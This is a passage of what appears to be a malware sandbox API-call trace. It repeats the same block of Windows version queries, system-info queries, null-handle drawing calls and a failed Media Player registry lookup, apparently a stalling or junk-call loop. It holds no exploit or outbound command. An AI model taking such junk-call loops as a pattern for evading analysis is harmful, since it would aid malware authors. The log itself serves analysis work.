dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.902] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.902] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.902] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.902] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.902] BeginPath (hdc=0x0) returned 0 [0090.902] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.902] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.902] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.902] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.902] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.902] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.902] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.902] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.902] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x860401d9 [0090.902] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x840401dc [0090.902] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045975 [0090.903] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045976 [0090.903] CombineRgn (hrgnDst=0x1045975, hrgnSrc1=0x860401d9, hrgnSrc2=0x840401dc, iMode=1) returned 1 [0090.903] CombineRgn (hrgnDst=0x1045976, hrgnSrc1=0x860401d9, hrgnSrc2=0x840401dc, iMode=4) returned 2 [0090.903] CreateSolidBrush (color=0xff) returned 0x2105974 [0090.903] CreateSolidBrush (color=0xff0000) returned 0x1105977 [0090.903] DeleteObject (ho=0x1105977) returned 1 [0090.903] DeleteObject (ho=0x840401dc) returned 1 [0090.903] DeleteObject (ho=0x860401d9) returned 1 [0090.903] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.903] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.903] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.903] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.903] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.903] BeginPath (hdc=0x0) returned 0 [0090.903] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.903] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.903] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.903] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.903] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.903] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.903] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.903] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.903] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x850401dc [0090.903] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x870401d9 [0090.903] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045978 [0090.903] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045979 [0090.903] CombineRgn (hrgnDst=0x1045978, hrgnSrc1=0x850401dc, hrgnSrc2=0x870401d9, iMode=1) returned 1 [0090.903] CombineRgn (hrgnDst=0x1045979, hrgnSrc1=0x850401dc, hrgnSrc2=0x870401d9, iMode=4) returned 2 [0090.903] CreateSolidBrush (color=0xff) returned 0x2105977 [0090.903] CreateSolidBrush (color=0xff0000) returned 0x110597a [0090.903] DeleteObject (ho=0x110597a) returned 1 [0090.903] DeleteObject (ho=0x870401d9) returned 1 [0090.903] DeleteObject (ho=0x850401dc) returned 1 [0090.903] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.903] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.904] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.904] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.904] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.904] BeginPath (hdc=0x0) returned 0 [0090.904] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.904] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.904] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.904] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.904] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.904] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.904] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.904] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.904] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x880401d9 [0090.904] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x860401dc [0090.904] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104597b [0090.904] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104597c [0090.904] CombineRgn (hrgnDst=0x104597b, hrgnSrc1=0x880401d9, hrgnSrc2=0x860401dc, iMode=1) returned 1 [0090.904] CombineRgn (hrgnDst=0x104597c, hrgnSrc1=0x880401d9, hrgnSrc2=0x860401dc, iMode=4) returned 2 [0090.904] CreateSolidBrush (color=0xff) returned 0x210597a [0090.904] CreateSolidBrush (color=0xff0000) returned 0x110597d [0090.904] DeleteObject (ho=0x110597d) returned 1 [0090.904] DeleteObject (ho=0x860401dc) returned 1 [0090.904] DeleteObject (ho=0x880401d9) returned 1 [0090.904] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.904] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.904] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.904] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.904] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.904] BeginPath (hdc=0x0) returned 0 [0090.904] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.904] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.904] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.904] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.904] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.904] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.904] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.904] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.905] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x870401dc [0090.905] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x890401d9 [0090.905] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104597e [0090.905] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104597f [0090.905] CombineRgn (hrgnDst=0x104597e, hrgnSrc1=0x870401dc, hrgnSrc2=0x890401d9, iMode=1) returned 1 [0090.905] CombineRgn (hrgnDst=0x104597f, hrgnSrc1=0x870401dc, hrgnSrc2=0x890401d9, iMode=4) returned 2 [0090.905] CreateSolidBrush (color=0xff) returned 0x210597d [0090.905] CreateSolidBrush (color=0xff0000) returned 0x1105980 [0090.905] DeleteObject (ho=0x1105980) returned 1 [0090.905] DeleteObject (ho=0x890401d9) returned 1 [0090.905] DeleteObject (ho=0x870401dc) returned 1 [0090.905] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.905] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.905] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.905] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.905] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.905] BeginPath (hdc=0x0) returned 0 [0090.905] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.905] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.905] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.905] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.905] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.905] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.905] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.905] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.905] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8a0401d9 [0090.905] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x880401dc [0090.905] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045981 [0090.905] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045982 [0090.905] CombineRgn (hrgnDst=0x1045981, hrgnSrc1=0x8a0401d9, hrgnSrc2=0x880401dc, iMode=1) returned 1 [0090.905] CombineRgn (hrgnDst=0x1045982, hrgnSrc1=0x8a0401d9, hrgnSrc2=0x880401dc, iMode=4) returned 2 [0090.905] CreateSolidBrush (color=0xff) returned 0x2105980 [0090.905] CreateSolidBrush (color=0xff0000) returned 0x1105983 [0090.906] DeleteObject (ho=0x1105983) returned 1 [0090.906] DeleteObject (ho=0x880401dc) returned 1 [0090.906] DeleteObject (ho=0x8a0401d9) returned 1 [0090.906] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.906] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.906] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.906] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.906] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.906] BeginPath (hdc=0x0) returned 0 [0090.906] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.906] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.906] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.906] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.906] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.906] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.906] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.906] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.906] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x890401dc [0090.906] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8b0401d9 [0090.906] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045984 [0090.906] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045985 [0090.906] CombineRgn (hrgnDst=0x1045984, hrgnSrc1=0x890401dc, hrgnSrc2=0x8b0401d9, iMode=1) returned 1 [0090.906] CombineRgn (hrgnDst=0x1045985, hrgnSrc1=0x890401dc, hrgnSrc2=0x8b0401d9, iMode=4) returned 2 [0090.906] CreateSolidBrush (color=0xff) returned 0x2105983 [0090.906] CreateSolidBrush (color=0xff0000) returned 0x1105986 [0090.906] DeleteObject (ho=0x1105986) returned 1 [0090.906] DeleteObject (ho=0x8b0401d9) returned 1 [0090.906] DeleteObject (ho=0x890401dc) returned 1 [0090.906] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.906] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.906] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.906] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.906] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.906] BeginPath (hdc=0x0) returned 0 [0090.906] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.906] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.906] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.907] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.907] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.907] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.907] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.907] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.907] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8c0401d9 [0090.907] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8a0401dc [0090.907] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045987 [0090.907] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045988 [0090.907] CombineRgn (hrgnDst=0x1045987, hrgnSrc1=0x8c0401d9, hrgnSrc2=0x8a0401dc, iMode=1) returned 1 [0090.907] CombineRgn (hrgnDst=0x1045988, hrgnSrc1=0x8c0401d9, hrgnSrc2=0x8a0401dc, iMode=4) returned 2 [0090.907] CreateSolidBrush (color=0xff) returned 0x2105986 [0090.907] CreateSolidBrush (color=0xff0000) returned 0x1105989 [0090.907] DeleteObject (ho=0x1105989) returned 1 [0090.907] DeleteObject (ho=0x8a0401dc) returned 1 [0090.907] DeleteObject (ho=0x8c0401d9) returned 1 [0090.907] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.907] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.907] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.907] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.907] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.907] BeginPath (hdc=0x0) returned 0 [0090.907] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.907] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.907] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.907] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.907] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.907] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.907] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.907] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.907] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8b0401dc [0090.908] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8d0401d9 [0090.908] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104598a [0090.908] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104598b [0090.908] CombineRgn (hrgnDst=0x104598a, hrgnSrc1=0x8b0401dc, hrgnSrc2=0x8d0401d9, iMode=1) returned 1 [0090.908] CombineRgn (hrgnDst=0x104598b, hrgnSrc1=0x8b0401dc, hrgnSrc2=0x8d0401d9, iMode=4) returned 2 [0090.908] CreateSolidBrush (color=0xff) returned 0x2105989 [0090.908] CreateSolidBrush (color=0xff0000) returned 0x110598c [0090.908] DeleteObject (ho=0x110598c) returned 1 [0090.908] DeleteObject (ho=0x8d0401d9) returned 1 [0090.908] DeleteObject (ho=0x8b0401dc) returned 1 [0090.908] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.908] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.908] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.908] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.908] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.908] BeginPath (hdc=0x0) returned 0 [0090.908] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.908] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0090.908] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.908] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0090.908] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0090.908] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0090.908] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0090.908] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0090.908] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8e0401d9 [0090.908] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8c0401dc [0090.908] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104598d [0090.908] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104598e [0090.908] CombineRgn (hrgnDst=0x104598d, hrgnSrc1=0x8e0401d9, hrgnSrc2=0x8c0401dc, iMode=1) returned 1 [0090.908] CombineRgn (hrgnDst=0x104598e, hrgnSrc1=0x8e0401d9, hrgnSrc2=0x8c0401dc, iMode=4) returned 2 [0090.908] CreateSolidBrush (color=0xff) returned 0x210598c [0090.908] CreateSolidBrush (color=0xff0000) returned 0x110598f [0090.908] DeleteObject (ho=0x110598f) returned 1 [0090.908] DeleteObject (ho=0x8c0401dc) returned 1 [0090.908] DeleteObject (ho=0x8e0401d9) returned 1 [0090.908] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.909] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.909] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0090.909] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0090.909] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0090.909] BeginPath (hdc=0x0) returned 0 [0090.909] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0090.909] AngleArc (hdc=0x0, x=0, 